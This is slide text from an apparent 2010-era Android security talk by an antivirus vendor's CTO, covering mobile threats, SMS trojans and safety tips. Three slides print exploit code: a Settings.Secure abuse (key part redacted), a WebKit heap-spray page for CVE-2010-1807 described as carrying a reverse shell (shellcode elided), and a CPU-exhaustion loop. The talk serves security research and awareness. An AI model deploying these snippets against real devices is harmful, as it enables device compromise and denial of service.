4. Agenda The problem Apps stores revolution Security research Android exploits + demos Android security Basics Me Me Me ... The world of tomorrow ToDo: mobile safe best practice
5. Me Me Me ... White hat hacker Former senior security researcher at finjan Former security architect at checkpoint Speaker in security conventions around the world EX-Windows boy, Javascript Ninja CTO & Co-founder at droidSecurity Made the first web based worm POC in 2003
6. About droidSecurity Makers of android ‘antivirus free’ & ‘antivirus pro’ First antivirus product in the android market, since march 2009, based on linux Innovative solution based on XML-RPC and cloud computing Ranked top 39th popular program in android market Ranked as number 3-5 in communication category Leaders of the android security market, with a strong security research team Installed on 5M devices >500,000 new users a month
7. The Problem Mobile phones became the most personal and private item we own possible replacement for windows Mobile devices are especially vulnerable to physical loss and theft A growing number of users, run real operating systems run on smartphones, probably will continue to grow in coming years Open source allows attackers to find exploits Always on, always connected mobile mini-computers, strong Hardware, with tons of users content the ‘usual” suspects : spam, spyware, phising , hacking tools, bad people, jailbreak devices, windows viruses *Smartphones survey:Type,jailbreak?
8. The Problem (Techie) Linuxs bugs --> problems in linux or 3 party libs File bugs --> file format vulnerabilities Users bug --> bugs in users SMS (text messages) as attack vector is 'wormable' There is no 3-party app content filtering in android market [Come one. Come all.] Privacy issues with GPS, camera and mic, cell tower info Smartphones can be pwned: compermise network security, attach pc's, sniff info 3 party apps have full access to phone features: in & outbound call interception, send/read SMS,GPS attackers can :steal money, identity ,sabotage networks, attack cell phones and computers, searching mails and pics,tap activities, calls, locate via cell tower & wireless networks
9. Mobile = Devices And More… Smart phones Google-TV Tablets External memory Chrome OS E-readers Devices - not just phones, but TVs, blu-ray players, netbooks, ereaders, MIDs
10.
11. Apps stores revolution People pay for content Open garden Vs closed garden Everyone has app store: Google,Apple,Nokia,Amazon Long tail - more then 100k apps in the market Android market- mobile software distribution platform ,with billing, updates and statistics No enforcement or testing policy aka iTunes/Apple 1984 regime Worm often masked as useful application or sexy stuff Different mobile content types to protect: applications (games, tools, etc),screen savers & wallpapers, ring tones,media (music, video, photos)
12.
13.
14. Android Exploits + demos Trojan-SMS.AndroidOS.FakePlayer virus Webkit HeapSpray Android 2.0-2.1 LauncherSpam, fake virus apps & fake icons Android Settings.Secure is Dead [Fixed,not deployed] Sorry, no demo for you! Android killer app, CPU Killer Bug
15. Trojan-SMS.AndroidOS.FakePlayer found on the wild It displays a message in Russian and then sends SMS messages without the user's consent. In Linux that would not have happened. Oh,it's Linux TrojanSMS.AndroidOS.FakePlayer The SMS it sends contains the string "798657" to Russian premium SMS short code numbers 3353,3354,sent $6 SMS messages Primitive ,POC level, with local distribution, limited damage Have another 2 porn related variants and use black SEO method Demo
16. LauncherSpam Install fake virus apps & icons on the victim device Publish on android market POC level Demo
17. try { ContentValues cV = new ContentValues() ; //Uri secure = Uri.parse("content://settings/secure") ; Uri secure = Uri.parse("content://settings/" + " ##..## ") ; ContentValues cv = new ContentValues() ; cv.put("name", "location_providers_allowed") ; cv.put("value", "gps") ; getContentResolver().insert(secure, cv) ; WifiManager mWifim = (WifiManager)getSystemService("wifi") ; boolean wifistate = mWifim.isWifiEnabled() ; mWifim.setWifiEnabled(!wifistate) ; mWifim.setWifiEnabled(wifistate) ; } catch (Exception e) {} try { ContentValues cv1 = new ContentValues() ; Uri secure = Uri.parse("content://settings/" + " ##..## ") ; cv1.put("name", "install_non_market_apps") ; cv1.put("value", "1") ; getContentResolver().insert(secure, cv1) ; } catch (Exception e) {} finish() ; // ##..## is a replacement for actual exploit code which remain private until fix is out Anroid Settings.Secure is dead
18. WebKit Heap Spray <html> <head> <script> // bug = webkit code execution CVE-2010-1807 //http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807 // listed as a safari bug but also works on android :) //tested = moto droid 2.0.1 , moto droid 2.1 , emulater 2.0 - 2.1 //patched= android 2.2 hardcoded reverse shell to 10.0.2.2 port 2222 function sploit(pop){ var span = document.createElement("div"); document.getElementById("pwn").appendChild(span); span.innerHTML = pop; } function heap(){ var scode = unescape ("3c8400573c80....More...Shell...Code...Here...687320002000200020002000200020002000200020000002ae08000a020220002000") do { scode += scode; } while(scode.length < 0x1000); target = new Array(); for(i = 0; i < 1000; i++) target[i] = scode; for (i = 0; i <= 1000; i++) { if (i>999) { sploit(-parseFloat("NAN(ffffe00572c60)")); } document.write("The targets!! " + target[i]); document.write("<br />"); }}</script> </head> <body id="pwn">woot<script> heap();</script> </body> </html> Demo
19. CPU Killer Bug AlarmManager am = (AlarmManager)getSystemService(ALARM_SERVICE) ; Intent op = new Intent(); op.setAction("cpuKillerReciver") ; PendingIntent operation = PendingIntent.getBroadcast(this, 1, op, PendingIntent.FLAG_UPDATE_CURRENT); am.setRepeating(AlarmManager.RTC_WAKEUP, System.currentTimeMillis() -2,1, operation); BroadcastReceiver br = new BroadcastReceiver() { @Override public void onReceive(Context context, Intent intent){} }; IntentFilter iFilter = new IntentFilter("cpuKillerReciver") ; registerReceiver(br, iFilter) ; Demo
20. Security Research Lots of research opportunities ,Platform well understood by hackers Mobile client-side web hacking spread Feds & Govs are playing Browser is native code (webkit) Some security classics are re-introduce ARM shell codes for android Decompile .dex back to .class or to source
21. The world of tomorrow Welcome to the new era of mobile phishing SMS spamming becomes aggressive "You have zero privacy anyway" - Scott McNealy, Sun (1999) Hijack devices in restricted area (GPS bomb) Back to the era of mobile phone dialers Trojan targeting fraud (espionage already in place) Botnet attack in the android Market
22. Downloading apps from untrusted or pirated sources Allowing strangers to borrow their phones Using 3rd party open source libraries, apps and components that may harbor bugs and malicious code Installing apps that do not come with positive user feedback or ratings Clicking on suspicious text messages, which ask for personal info, passwords or ask to take urgent actions Conducting online banking activities via unofficial apps Letting others, including family members ( kids in particular ) play with their phones or install apps High Risk Practices Mobile Users Should Avoid ToDo: mobile safe best practice *Change iPhone's "alpine" root pass
23. Conclusions Are we entering the State of Mobile Sabotage age? Oh yeah, Mobile Devices are as bad as their software authors Mobile world is a brand new game with new rules Cheap hardware appliances open a door for “bad guys” SMS (text messages) as attack vector is 'wormable' mobile devices goes to Starbucks with the user to drink coffee and could be left behind